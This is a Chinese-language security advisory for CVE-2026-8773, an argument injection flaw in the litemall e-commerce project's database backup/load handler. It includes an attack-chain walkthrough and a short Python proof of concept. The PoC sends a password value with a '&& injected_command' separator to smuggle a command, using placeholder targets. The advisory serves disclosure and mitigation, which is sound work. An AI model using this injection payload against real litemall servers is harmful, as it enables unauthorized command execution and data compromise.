CVE-2026-8773 CVSS 4.7 中危

CVE-2026-8773 linlinjava litemall参数注入漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8773

漏洞类型

参数注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

linlinjava litemall

漏洞概述

linlinjava litemall 1.8.0及之前版本存在安全漏洞。该漏洞位于DbUtil.java文件的数据库设置处理组件中，具体影响backup/load函数。攻击者通过操纵db/password参数可触发参数注入攻击。尽管需要高权限，但攻击可远程进行，且利用代码已公开，可能导致系统机密性、完整性及可用性受损。

技术细节

该漏洞源于linlinjava litemall项目中的DbUtil.java文件在处理数据库备份与恢复操作时存在逻辑缺陷。当Database Setting Handler组件的backup/load函数被调用时，系统未对传入的db/password参数进行充分的边界检查和安全过滤，直接将其用于后续的数据库操作命令构建中。由于CVSS向量显示需高权限（PR:H），攻击者通常需要先获取管理员权限或通过其他方式绕过认证。一旦满足条件，攻击者可在参数中注入特定的控制字符或恶意指令，改变原定命令的执行逻辑。这种参数注入虽然CVSS评分为4.7（中危），但已公开的PoC表明攻击者可利用此漏洞读取敏感信息或破坏数据库服务的正常运行。

攻击链分析

STEP 1

侦察与认证

攻击者探测目标系统并获取高权限账号（管理员权限），因为漏洞利用需要PR:H。

STEP 2

构造恶意请求

攻击者针对Database Setting Handler的backup/load接口，在db/password参数中注入特定的恶意参数或命令分隔符。

STEP 3

发送攻击载荷

利用已获取的高权限会话，向服务器发送包含恶意db/password参数的HTTP POST请求。

STEP 4

执行注入操作

服务器端DbUtil.java处理请求时，未过滤恶意参数，导致系统执行非预期的数据库指令或系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-8773
# Target: linlinjava litemall <= 1.8.0
# Description: Argument Injection via db/password parameter

target_url = "http://target-host:port/admin/db/backup"

# Attacker needs High Privileges (PR:H)
cookies = {
    "token": "valid_admin_session_token"
}

# Malicious payload injection in the password field
# Example payload might include command separators or specific arguments
payload = "valid_password && injected_command"

data = {
    "db/host": "localhost",
    "db/port": "3306",
    "db/name": "litemall",
    "db/username": "root",
    "db/password": payload
}

response = requests.post(target_url, data=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Payload sent successfully. Check server response for confirmation.")
else:
    print("[-] Request failed.")

影响范围

linlinjava litemall <= 1.8.0

防御指南

临时缓解措施

在官方修复版本发布前，建议管理员暂时禁用数据库备份与加载功能，或在网络层面严格限制访问来源IP。同时，加强对管理后台的身份认证机制，确保攻击者难以获取高权限账号。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8773
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8773
3 Details https://www.cvedetails.com/cve/CVE-2026-8773/
4 VulDB https://vuldb.com/cve/CVE-2026-8773
5 Link https://gist.github.com/A1AAAAAAAAAA1/d5ae30a17744459e7cc5902fff32a35b
6 Link https://vuldb.com/submit/811469
7 Link https://vuldb.com/vuln/364398
8 Link https://vuldb.com/vuln/364398/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表